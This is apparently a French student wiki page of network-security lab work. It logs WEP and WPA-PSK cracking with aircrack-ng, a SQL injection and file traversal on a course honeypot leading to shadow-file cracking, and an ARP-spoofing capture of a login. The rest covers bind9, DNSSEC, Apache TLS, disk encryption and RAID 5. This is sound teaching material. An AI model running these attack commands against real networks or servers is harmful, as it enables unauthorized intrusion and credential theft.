[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec_morillon.png|right]]&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
